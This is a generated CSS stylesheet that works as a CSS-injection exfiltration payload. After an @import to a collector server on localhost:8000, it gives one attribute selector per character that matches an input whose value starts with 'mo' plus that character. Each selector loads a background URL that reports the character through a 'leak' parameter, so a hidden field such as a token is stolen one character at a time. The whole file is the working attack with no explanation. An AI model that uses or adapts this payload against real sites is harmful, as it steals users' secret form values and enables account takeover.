@import url("http://localhost:8000/?l=4");
input[value="mo!"] {background: url("http://localhost:8000/?leak=!&q=0.8880383679978858");}
input[value="mo\""] {background: url("http://localhost:8000/?leak=\"&q=0.2719223328526459");}
input[value="mo#"] {background: url("http://localhost:8000/?leak=#&q=0.2679278407014063");}
input[value="mo$"] {background: url("http://localhost:8000/?leak=$&q=0.17894998983691002");}
input[value="mo%"] {background: url("http://localhost:8000/?leak=%&q=0.600270740290423");}
input[value="mo&"] {background: url("http://localhost:8000/?leak=&&q=0.7891031899395193");}
input[value="mo'"] {background: url("http://localhost:8000/?leak='&q=0.6104813104385638");}
input[value="mo("] {background: url("http://localhost:8000/?leak=(&q=0.46997726164905407");}
input[value="mo)"] {background: url("http://localhost:8000/?leak=)&q=0.45456341707899806");}
input[value="mo*"] {background: url("http://localhost:8000/?leak=*&q=0.962544436244958");}
input[value="mo+"] {background: url("http://localhost:8000/?leak=+&q=0.8447727669359153");}
input[value="mo,"] {background: url("http://localhost:8000/?leak=,&q=0.016820164241200697");}
input[value="mo-"] {background: url("http://localhost:8000/?leak=-&q=0.2528264585563762");}
input[value="mo."] {background: url("http://localhost:8000/?leak=.&q=0.7008895312474805");}
input[value="mo/"] {background: url("http://localhost:8000/?leak=/&q=0.62681444678311");}
input[value="mo0"] {background: url("http://localhost:8000/?leak=0&q=0.9103627542698223");}
input[value="mo1"] {background: url("http://localhost:8000/?leak=1&q=0.1814592808993749");}
input[value="mo2"] {background: url("http://localhost:8000/?leak=2&q=0.6984664703524865");}
input[value="mo3"] {background: url("http://localhost:8000/?leak=3&q=0.28203114601075585");}
input[value="mo4"] {background: url("http://localhost:8000/?leak=4&q=0.15045351204353152");}
input[value="mo5"] {background: url("http://localhost:8000/?leak=5&q=0.7333606330430746");}
input[value="mo6"] {background: url("http://localhost:8000/?leak=6&q=0.31126853631675244");}
input[value="mo7"] {background: url("http://localhost:8000/?leak=7&q=0.5743489265142212");}
input[value="mo8"] {background: url("http://localhost:8000/?leak=8&q=0.8062889017798944");}
input[value="mo9"] {background: url("http://localhost:8000/?leak=9&q=0.9496266598888516");}
input[value="mo:"] {background: url("http://localhost:8000/?leak=:&q=0.31855243220899965");}
input[value="mo;"] {background: url("http://localhost:8000/?leak=;&q=0.25905562286679396");}
input[value="mo<"] {background: url("http://localhost:8000/?leak=<&q=0.3205274510558902");}
input[value="mo="] {background: url("http://localhost:8000/?leak==&q=0.1483720601524121");}
input[value="mo>"] {background: url("http://localhost:8000/?leak=>&q=0.2852428587460629");}
input[value="mo?"] {background: url("http://localhost:8000/?leak=?&q=0.018867325748804342");}
input[value="mo@"] {background: url("http://localhost:8000/?leak=@&q=0.36607281675575987");}
input[value="moA"] {background: url("http://localhost:8000/?leak=A&q=0.5455243968063241");}
input[value="moB"] {background: url("http://localhost:8000/?leak=B&q=0.6551792594050532");}
input[value="moC"] {background: url("http://localhost:8000/?leak=C&q=0.3902955023473318");}
input[value="moD"] {background: url("http://localhost:8000/?leak=D&q=0.5051816422768638");}
input[value="moE"] {background: url("http://localhost:8000/?leak=E&q=0.7311052593934866");}
input[value="moF"] {background: url("http://localhost:8000/?leak=F&q=0.6840206946612208");}
input[value="moG"] {background: url("http://localhost:8000/?leak=G&q=0.16729165996304718");}
input[value="moH"] {background: url("http://localhost:8000/?leak=H&q=0.3617471319258456");}
input[value="moI"] {background: url("http://localhost:8000/?leak=I&q=0.2989168903098214");}
input[value="moJ"] {background: url("http://localhost:8000/?leak=J&q=0.6489719344802813");}
input[value="moK"] {background: url("http://localhost:8000/?leak=K&q=0.10758659570119566");}
input[value="moL"] {background: url("http://localhost:8000/?leak=L&q=0.9393391048069031");}
input[value="moM"] {background: url("http://localhost:8000/?leak=M&q=0.04825045576722942");}
input[value="moN"] {background: url("http://localhost:8000/?leak=N&q=0.7653772050204692");}
input[value="moO"] {background: url("http://localhost:8000/?leak=O&q=0.8908593441536474");}
input[value="moP"] {background: url("http://localhost:8000/?leak=P&q=0.3478419872208376");}
input[value="moQ"] {background: url("http://localhost:8000/?leak=Q&q=0.8281974942184609");}
input[value="moR"] {background: url("http://localhost:8000/?leak=R&q=0.045013257871544754");}
input[value="moS"] {background: url("http://localhost:8000/?leak=S&q=0.8662969371109366");}
input[value="moT"] {background: url("http://localhost:8000/?leak=T&q=0.48025174069524845");}
input[value="moU"] {background: url("http://localhost:8000/?leak=U&q=0.7186901450737924");}
input[value="moV"] {background: url("http://localhost:8000/?leak=V&q=0.9086912654462889");}
input[value="moW"] {background: url("http://localhost:8000/?leak=W&q=0.21732211680235092");}
input[value="moX"] {background: url("http://localhost:8000/?leak=X&q=0.8289437213229134");}
input[value="moY"] {background: url("http://localhost:8000/?leak=Y&q=0.5829445101514878");}
input[value="moZ"] {background: url("http://localhost:8000/?leak=Z&q=0.034428852995819215");}
input[value="mo["] {background: url("http://localhost:8000/?leak=[&q=0.3399345772122342");}
input[value="mo\\"] {background: url("http://localhost:8000/?leak=\\&q=0.34874950840047836");}
input[value="mo]"] {background: url("http://localhost:8000/?leak=]&q=0.8950464580691333");}
input[value="mo^"] {background: url("http://localhost:8000/?leak=^&q=0.971728513770977");}
input[value="mo_"] {background: url("http://localhost:8000/?leak=_&q=0.055306194913670836");}
input[value="mo`"] {background: url("http://localhost:8000/?leak=`&q=0.582346143502753");}
input[value="moa"] {background: url("http://localhost:8000/?leak=a&q=0.4308435809313207");}
input[value="mob"] {background: url("http://localhost:8000/?leak=b&q=0.9478992986521051");}
input[value="moc"] {background: url("http://localhost:8000/?leak=c&q=0.07902295033405471");}
input[value="mod"] {background: url("http://localhost:8000/?leak=d&q=0.3763609837822708");}
input[value="moe"] {background: url("http://localhost:8000/?leak=e&q=0.9391461161920329");}
input[value="mof"] {background: url("http://localhost:8000/?leak=f&q=0.4775254823799231");}
input[value="mog"] {background: url("http://localhost:8000/?leak=g&q=0.42682181801026564");}
input[value="moh"] {background: url("http://localhost:8000/?leak=h&q=0.9006018569408152");}
input[value="moi"] {background: url("http://localhost:8000/?leak=i&q=0.3181136969130576");}
input[value="moj"] {background: url("http://localhost:8000/?leak=j&q=0.8841938439540591");}
input[value="mok"] {background: url("http://localhost:8000/?leak=k&q=0.10262164246036365");}
input[value="mol"] {background: url("http://localhost:8000/?leak=l&q=0.5343468115819245");}
input[value="mom"] {background: url("http://localhost:8000/?leak=m&q=0.9626515555018567");}
input[value="mon"] {background: url("http://localhost:8000/?leak=n&q=0.14599993557810453");}
input[value="moo"] {background: url("http://localhost:8000/?leak=o&q=0.6775435815904944");}
input[value="mop"] {background: url("http://localhost:8000/?leak=p&q=0.19984563632156993");}
input[value="moq"] {background: url("http://localhost:8000/?leak=q&q=0.7377592581560375");}
input[value="mor"] {background: url("http://localhost:8000/?leak=r&q=0.5828986087117662");}
input[value="mos"] {background: url("http://localhost:8000/?leak=s&q=0.9612454924444152");}
input[value="mot"] {background: url("http://localhost:8000/?leak=t&q=0.19795229367720357");}
input[value="mou"] {background: url("http://localhost:8000/?leak=u&q=0.5498158126438164");}
input[value="mov"] {background: url("http://localhost:8000/?leak=v&q=0.6267447063821456");}
input[value="mow"] {background: url("http://localhost:8000/?leak=w&q=0.7271970032973016");}
input[value="mox"] {background: url("http://localhost:8000/?leak=x&q=0.7405519562817577");}
input[value="moy"] {background: url("http://localhost:8000/?leak=y&q=0.3496719918590854");}
input[value="moz"] {background: url("http://localhost:8000/?leak=z&q=0.9661258887060948");}
input[value="mo{"] {background: url("http://localhost:8000/?leak={&q=0.860556329401434");}
input[value="mo|"] {background: url("http://localhost:8000/?leak=|&q=0.5558626071996593");}
input[value="mo}"] {background: url("http://localhost:8000/?leak=}&q=0.4101223024810794");}
input[value="mo~"] {background: url("http://localhost:8000/?leak=~&q=0.7071574742652198");}
input[value="mo"] {background: url("http://localhost:8000/?leak=&q=0.6726611974769048");}
input[value="mo"] {background: url("http://localhost:8000/?leak=&q=0.9406330621235093");}
input[value="mo"] {background: url("http://localhost:8000/?leak=&q=0.6692851180009496");}
input[value="mo"] {background: url("http://localhost:8000/?leak=&q=0.9127637389626364");}
input[value="mo"] {background: url("http://localhost:8000/?leak=&q=0.7370406940779808");}
input[value="mo"] {background: url("http://localhost:8000/?leak=&q=0.6414782635181198");}
input[value="mo"] {background: url("http://localhost:8000/?leak=&q=0.32938487700279717");}
input[value="mo"] {background: url("http://localhost:8000/?leak=&q=0.7025699637908054");}
input[value="mo"] {background: url("http://localhost:8000/?leak=&q=0.8970372065830166");}
input[value="mo"] {background: url("http://localhost:8000/?leak=&q=0.5465810119238288");}
input[value="mo"] {background: url("http://localhost:8000/?leak=&q=0.7723833168704584");}
input[value="mo"] {background: url("http://localhost:8000/?leak=&q=0.46362140763455684");}
input[value="mo"] {background: url("http://localhost:8000/?leak=&q=0.2877937966364128");}
input[value="mo"] {background: url("http://localhost:8000/?leak=&q=0.2641250427594106");}
input[value="mo"] {background: url("http://localhost:8000/?leak=&q=0.8953361646285978");}
input[value="mo"] {background: url("http://localhost:8000/?leak=&q=0.08366579620252246");}
input[value="mo"] {background: url("http://localhost:8000/?leak=&q=0.9537375850552401");}
input[value="mo"] {background: url("http://localhost:8000/?leak=&q=0.3306989005118939");}
input[value="mo"] {background: url("http://localhost:8000/?leak=&q=0.16387352241401354");}
input[value="mo"] {background: url("http://localhost:8000/?leak=&q=0.6334785732674448");}
input[value="mo"] {background: url("http://localhost:8000/?leak=&q=0.4771965769617612");}
input[value="mo"] {background: url("http://localhost:8000/?leak=&q=0.12962768017600768");}
input[value="mo"] {background: url("http://localhost:8000/?leak=&q=0.7660918431914809");}
input[value="mo"] {background: url("http://localhost:8000/?leak=&q=0.6755735828678564");}
input[value="mo"] {background: url("http://localhost:8000/?leak=&q=0.1549156585255156");}
input[value="mo"] {background: url("http://localhost:8000/?leak=&q=0.7409906082461015");}
input[value="mo"] {background: url("http://localhost:8000/?leak=&q=0.9490978897283784");}
input[value="mo"] {background: url("http://localhost:8000/?leak=&q=0.8853846105542951");}
input[value="mo"] {background: url("http://localhost:8000/?leak=&q=0.8511891159186316");}
input[value="mo"] {background: url("http://localhost:8000/?leak=&q=0.5378879686454423");}
input[value="mo"] {background: url("http://localhost:8000/?leak=&q=0.3891674668492242");}
input[value="mo"] {background: url("http://localhost:8000/?leak=&q=0.7964406995914377");}
input[value="mo"] {background: url("http://localhost:8000/?leak=&q=0.06285732094252805");}
input[value="mo "] {background: url("http://localhost:8000/?leak= &q=0.9430314857727091");}
input[value="mo¡"] {background: url("http://localhost:8000/?leak=¡&q=0.5646049585123936");}
input[value="mo¢"] {background: url("http://localhost:8000/?leak=¢&q=0.13177925372470578");}
input[value="mo£"] {background: url("http://localhost:8000/?leak=£&q=0.7782749032717453");}
input[value="mo¤"] {background: url("http://localhost:8000/?leak=¤&q=0.6762934881970788");}
input[value="mo¥"] {background: url("http://localhost:8000/?leak=¥&q=0.30166582583996204");}
input[value="mo¦"] {background: url("http://localhost:8000/?leak=¦&q=0.9141499130276034");}
input[value="mo§"] {background: url("http://localhost:8000/?leak=§&q=0.7510150803363862");}
input[value="mo¨"] {background: url("http://localhost:8000/?leak=¨&q=0.881953471618051");}
input[value="mo©"] {background: url("http://localhost:8000/?leak=©&q=0.9161257393083615");}
input[value="moª"] {background: url("http://localhost:8000/?leak=ª&q=0.8622029641036653");}
input[value="mo«"] {background: url("http://localhost:8000/?leak=«&q=0.5029114850565226");}
input[value="mo¬"] {background: url("http://localhost:8000/?leak=¬&q=0.46886470237672717");}
input[value="mo­"] {background: url("http://localhost:8000/?leak=­&q=0.8004828931705699");}
input[value="mo®"] {background: url("http://localhost:8000/?leak=®&q=0.6921579981960475");}
input[value="mo¯"] {background: url("http://localhost:8000/?leak=¯&q=0.8145514681330364");}
input[value="mo°"] {background: url("http://localhost:8000/?leak=°&q=0.04229482777800375");}
input[value="mo±"] {background: url("http://localhost:8000/?leak=±&q=0.12300242803930606");}
input[value="mo²"] {background: url("http://localhost:8000/?leak=²&q=0.4980227136819273");}
input[value="mo³"] {background: url("http://localhost:8000/?leak=³&q=0.2544138579754025");}
input[value="mo´"] {background: url("http://localhost:8000/?leak=´&q=0.5635487666325001");}
input[value="moµ"] {background: url("http://localhost:8000/?leak=µ&q=0.3596085386606258");}
input[value="mo¶"] {background: url("http://localhost:8000/?leak=¶&q=0.2969636964848703");}
input[value="mo·"] {background: url("http://localhost:8000/?leak=·&q=0.0020862644198385016");}
input[value="mo¸"] {background: url("http://localhost:8000/?leak=¸&q=0.4944472573960863");}
input[value="mo¹"] {background: url("http://localhost:8000/?leak=¹&q=0.5599883713847931");}
input[value="moº"] {background: url("http://localhost:8000/?leak=º&q=0.435951399384666");}
input[value="mo»"] {background: url("http://localhost:8000/?leak=»&q=0.16820282994137292");}
input[value="mo¼"] {background: url("http://localhost:8000/?leak=¼&q=0.6639299315833098");}
input[value="mo½"] {background: url("http://localhost:8000/?leak=½&q=0.5744202504894822");}
input[value="mo¾"] {background: url("http://localhost:8000/?leak=¾&q=0.5323442947140438");}
input[value="mo¿"] {background: url("http://localhost:8000/?leak=¿&q=0.9458070965503891");}
input[value="moÀ"] {background: url("http://localhost:8000/?leak=À&q=0.7335459349379472");}
input[value="moÁ"] {background: url("http://localhost:8000/?leak=Á&q=0.04836561721689625");}
input[value="moÂ"] {background: url("http://localhost:8000/?leak=Â&q=0.8938637381146883");}
input[value="moÃ"] {background: url("http://localhost:8000/?leak=Ã&q=0.7584811473647788");}
input[value="moÄ"] {background: url("http://localhost:8000/?leak=Ä&q=0.03350452445244967");}
input[value="moÅ"] {background: url("http://localhost:8000/?leak=Å&q=0.8769328098909841");}
input[value="moÆ"] {background: url("http://localhost:8000/?leak=Æ&q=0.5362086069575447");}
input[value="moÇ"] {background: url("http://localhost:8000/?leak=Ç&q=0.9697917347766813");}
input[value="moÈ"] {background: url("http://localhost:8000/?leak=È&q=0.334812899471298");}
input[value="moÉ"] {background: url("http://localhost:8000/?leak=É&q=0.576339270289558");}
input[value="moÊ"] {background: url("http://localhost:8000/?leak=Ê&q=0.9428284384230805");}
input[value="moË"] {background: url("http://localhost:8000/?leak=Ë&q=0.09663084348853967");}
input[value="moÌ"] {background: url("http://localhost:8000/?leak=Ì&q=0.43393186347305135");}
input[value="moÍ"] {background: url("http://localhost:8000/?leak=Í&q=0.007621673230608028");}
input[value="moÎ"] {background: url("http://localhost:8000/?leak=Î&q=0.7537077442626487");}
input[value="moÏ"] {background: url("http://localhost:8000/?leak=Ï&q=0.28428035606541746");}
input[value="moÐ"] {background: url("http://localhost:8000/?leak=Ð&q=0.9506455102573435");}
input[value="moÑ"] {background: url("http://localhost:8000/?leak=Ñ&q=0.47199956280258415");}
input[value="moÒ"] {background: url("http://localhost:8000/?leak=Ò&q=0.7070787908213725");}
input[value="moÓ"] {background: url("http://localhost:8000/?leak=Ó&q=0.1888989280123694");}
input[value="moÔ"] {background: url("http://localhost:8000/?leak=Ô&q=0.0685456278138632");}
input[value="moÕ"] {background: url("http://localhost:8000/?leak=Õ&q=0.46048297269697214");}
input[value="moÖ"] {background: url("http://localhost:8000/?leak=Ö&q=0.744194594959021");}
input[value="mo×"] {background: url("http://localhost:8000/?leak=×&q=0.796324552357059");}
input[value="moØ"] {background: url("http://localhost:8000/?leak=Ø&q=0.122807663503546");}
input[value="moÙ"] {background: url("http://localhost:8000/?leak=Ù&q=0.551686917966161");}
input[value="moÚ"] {background: url("http://localhost:8000/?leak=Ú&q=0.8337245388101586");}
input[value="moÛ"] {background: url("http://localhost:8000/?leak=Û&q=0.2837994719352479");}
input[value="moÜ"] {background: url("http://localhost:8000/?leak=Ü&q=0.8076848143914108");}
input[value="moÝ"] {background: url("http://localhost:8000/?leak=Ý&q=0.6791440986449635");}
input[value="moÞ"] {background: url("http://localhost:8000/?leak=Þ&q=0.019896663320686292");}
input[value="moß"] {background: url("http://localhost:8000/?leak=ß&q=0.44741236348260793");}
input[value="moà"] {background: url("http://localhost:8000/?leak=à&q=0.8018359700239981");}
input[value="moá"] {background: url("http://localhost:8000/?leak=á&q=0.5474005557812798");}
input[value="moâ"] {background: url("http://localhost:8000/?leak=â&q=0.869756354225643");}
input[value="moã"] {background: url("http://localhost:8000/?leak=ã&q=0.3510660769079619");}
input[value="moä"] {background: url("http://localhost:8000/?leak=ä&q=0.4807577116089583");}
input[value="moå"] {background: url("http://localhost:8000/?leak=å&q=0.02386236550502252");}
input[value="moæ"] {background: url("http://localhost:8000/?leak=æ&q=0.5593584766941666");}
input[value="moç"] {background: url("http://localhost:8000/?leak=ç&q=0.1718119819294157");}
input[value="moè"] {background: url("http://localhost:8000/?leak=è&q=0.5791606857402616");}
input[value="moé"] {background: url("http://localhost:8000/?leak=é&q=0.4010269642943025");}
input[value="moê"] {background: url("http://localhost:8000/?leak=ê&q=0.8607258854485276");}
input[value="moë"] {background: url("http://localhost:8000/?leak=ë&q=0.5315890544803707");}
input[value="moì"] {background: url("http://localhost:8000/?leak=ì&q=0.14071684774198778");}
input[value="moí"] {background: url("http://localhost:8000/?leak=í&q=0.0862441395631579");}
input[value="moî"] {background: url("http://localhost:8000/?leak=î&q=0.20856508403487695");}
input[value="moï"] {background: url("http://localhost:8000/?leak=ï&q=0.06835650485340006");}
input[value="moð"] {background: url("http://localhost:8000/?leak=ð&q=0.6905097123225847");}
input[value="moñ"] {background: url("http://localhost:8000/?leak=ñ&q=0.008850142463774135");}
input[value="moò"] {background: url("http://localhost:8000/?leak=ò&q=0.8335534893300582");}
input[value="moó"] {background: url("http://localhost:8000/?leak=ó&q=0.6216718270395871");}
input[value="moô"] {background: url("http://localhost:8000/?leak=ô&q=0.7354178308392638");}
input[value="moõ"] {background: url("http://localhost:8000/?leak=õ&q=0.1855955743625226");}
input[value="moö"] {background: url("http://localhost:8000/?leak=ö&q=0.5436689733611926");}
input[value="mo÷"] {background: url("http://localhost:8000/?leak=÷&q=0.8234051977662622");}
input[value="moø"] {background: url("http://localhost:8000/?leak=ø&q=0.5131205638005234");}
input[value="moù"] {background: url("http://localhost:8000/?leak=ù&q=0.42637255965319");}
input[value="moú"] {background: url("http://localhost:8000/?leak=ú&q=0.17111668066164287");}
input[value="moû"] {background: url("http://localhost:8000/?leak=û&q=0.28101510809596375");}
input[value="moü"] {background: url("http://localhost:8000/?leak=ü&q=0.7048108069550103");}
input[value="moý"] {background: url("http://localhost:8000/?leak=ý&q=0.591861806988702");}
input[value="moþ"] {background: url("http://localhost:8000/?leak=þ&q=0.772629635831815");}
input[value="moÿ"] {background: url("http://localhost:8000/?leak=ÿ&q=0.3388932853658817");}
